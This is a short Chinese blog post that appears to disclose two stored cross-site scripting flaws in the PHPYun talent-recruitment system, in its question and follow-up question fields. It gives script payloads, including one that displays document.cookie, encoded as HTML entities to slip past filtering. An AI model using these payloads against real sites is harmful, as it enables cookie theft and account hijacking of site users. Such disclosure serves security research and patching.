php云人才系统存储型跨站两处

时间:2015-1-15    作者:admin    分类: 技术交流

0x01: 我要提问



================================================================



我们先将要注入的代码做HTML编码,例如:



<script>alert(1);</script>



编码后为: 

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;





然后贴到内容里面:

1.png



添加

2.png



添加成功后就可以看到弹框:

3.png





0x02: 追加问题

================================================================

同样,先将要注入的代码做HTML编码,例如: 

<script>alert(document.cookie);</script>



编码后的内容为: 

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;



然后贴到内容里面:

4.png



回答提交后,即可弹框:

5.png

标签: xss php云人才

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接